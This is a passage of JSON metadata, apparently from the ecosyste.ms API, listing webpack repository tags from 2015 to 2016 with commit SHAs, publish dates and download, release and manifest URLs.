:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/web